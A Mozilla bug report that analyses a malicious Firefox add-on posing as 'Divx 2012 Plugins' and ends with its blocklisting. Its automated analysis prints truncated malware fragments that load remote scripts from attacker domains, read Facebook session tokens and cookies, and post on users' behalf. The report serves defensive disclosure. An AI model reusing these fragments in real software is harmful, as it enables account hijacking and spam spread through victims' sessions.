Last Comment Bug 758503 - Malicious "Divx 2012" add-on
: Malicious "Divx 2012" add-on
Status: RESOLVED FIXED
:
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
:
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2012-05-24 21:17 PDT by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
20120524_malicious_plugin.zip (password malwares4mple) (39.23 KB, application/octet-stream)
2012-05-24 21:17 PDT, MarkH
no flags Details

Description MarkH 2012-05-24 21:17:05 PDT
Created attachment 627095 [details]
20120524_malicious_plugin.zip (password malwares4mple)

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5

Steps to reproduce:

Downloaded add-on from 


Actual results:

Report for http://pluginstall.info/2012.xpi

** Embedded and Remote Files **

install.rdf
chrome.manifest
content/script-compiler.js
content/youtube.js
http://pluginstall.info/video/script.js
http://plugin2012.info/you.js
http://plugin2012.info/viral1.js
http://plugin2012.info/ultra.js
http://plugin2012.info/ultra2.js
content/xmlhttprequester.js
content/script-compiler-overlay.xul
http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
content/skin/icon.png
content/prefman.js


** Embedded Metadata **

<em:name>Divx 2012 Plugins</em:name>
<em:version>9.4.2</em:version>
<em:targetApplication>
<em:minVersion>2.0</em:minVersion>
<em:maxVersion>10.*</em:maxVersion>
</em:targetApplication>
<em:creator>Your Tube</em:creator>
<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>
<em:description>videos plugins</em:description>
<em:homepageURL>http://youtube3ee.com/</em:homepageURL>
<em:updateURL>http://brownizzeee.info/test/update.rdf</em:updateURL>
...<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUtKPOGhnhlxo7vRoSR0YC1g/Mo...


** Files Loaded **

<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>
...overlay	chrome://browser/content/browser.xul	chrome://youtube/content/script-com...
'chrome://youtube/content/youtube.js'
...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s...


** Remote Javascript Loaded **

<Description about="urn:mozilla:install-manifest">
<Description>
</Description>
<em:description>videos plugins</em:description>
</Description>
...nt/browser.xul	chrome://youtube/content/script-compiler-overlay.xul
var	scriptableStream=Components
.classes["@mozilla.org/scriptableinputstream;1"]
.getService(Components.interfaces.nsIScriptableInputStream);
.classes["@mozilla.org/intl/scriptableunicodeconverter"]
.createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
scriptableStream.init(input);
var	str=scriptableStream.read(input.available());
scriptableStream.close();
var script=youtube_gmCompiler.getUrlContents(
youtube_gmCompiler.injectScript(script, href, unsafeWin);
injectScript: function(script, url, unsafeContentWin) {
var sandbox, script, logger, storage, xmlhttpRequester;
var storage=new youtube_ScriptStorage();
"(function(){"+script+"})()",
e2.fileName=script.filename;
function youtube_ScriptStorage() {
youtube_ScriptStorage.prototype.setValue = function(name, val) {
youtube_ScriptStorage.prototype.getValue = function(name, defVal) {
loadScript_you();
function loadScript_you() {
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://pluginstall.info/video/script.js");
function addScript() {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
s.setAttribute("src", "http://plugin2012.info/you.js");
function addScript(src) {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
var a = document.getElementsByTagName('script')[0];
addScript("http://plugin2012.info/viral1.js");
addScript("http://plugin2012.info/ultra.js");
addScript("http://plugin2012.info/ultra2.js");
var a = document.getElementsByTagName('script')[0];
addScript();
// this function gets called by user scripts in content security scope to
...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s...


** Facebook Paths Accessed **

blogs[0] = 'http://www.facebook.com/bra.toch?';
blogs[1] = 'http://www.facebook.com/bra.toch?';
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {


** Facebook Data Accessed **

var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
user_id = readCookie('c_user');
var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
user_id = readCookie('c_user');
var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
user_id = readCookie('c_user');


** HTTP Requests **

var c = new XMLHttpRequest();
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);
var c = new XMLHttpRequest();
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);
var c = new XMLHttpRequest();
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);
var req = new this.chromeWindow.XMLHttpRequest();


** All URLs Loaded or Mentioned **

<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<em:homepageURL>http://youtube3ee.com/</em:homepageURL>
<em:updateURL>http://brownizzeee.info/test/update.rdf</em:updateURL>
// http://www.letitblog.com/code/python/greasemonkey.py.txt
// http://greasemonkey.devjavu.com/
change[i].src="http://faceredirects.blogspot.ca/?iframe";
ifra.src="http://faceredirects.blogspot.ca/?iframe"
...L='<iframe id="change" width="500" src="http://faceredirects.blogspot.ca/?iframe...
blogs[0] = 'http://www.facebook.com/bra.toch?';
blogs[1] = 'http://www.facebook.com/bra.toch?';
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
addScript("http://plugin2012.info/viral1.js");
blogs[0] = 'http://dl.dropbox.com/u/81406642/a.html?';
blogs[1] = 'http://dl.dropbox.com/u/81406642/a.html?';
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
... '<center><br><br><br><br><br><img src="http://i.imgur.com/4BDZc.gif" /><br />Pl...
...setTimeout('top.location=\'http://faceredirects.blogspot.ca/?security\';', 10000...
addScript("http://plugin2012.info/ultra.js");
blogs[0] = 'http://dl.dropbox.com/u/81406642/b.html?';
blogs[1] = 'http://dl.dropbox.com/u/81406642/b.html?';
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
... '<center><br><br><br><br><br><img src="http://i.imgur.com/4BDZc.gif" /><br />Pl...
...setTimeout('top.location=\'http://faceredirects.blogspot.ca/?security\';', 10000...
addScript("http://plugin2012.info/ultra2.js");
s.setAttribute("src", "http://plugin2012.info/you.js");
s.setAttribute("src", "http://pluginstall.info/video/script.js");
...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></...
...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/...
...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper...


Expected results:

It should not access your Facebook session tokens and cookies and then post messages on your behalf without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-05-25 09:24:29 PDT
Id: youtubeee@youtuber3.com
Comment 2 Jorge Villalobos [:jorgev] 2012-05-25 09:27:11 PDT
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i96

Note You need to log in before you can comment on or make changes to this bug.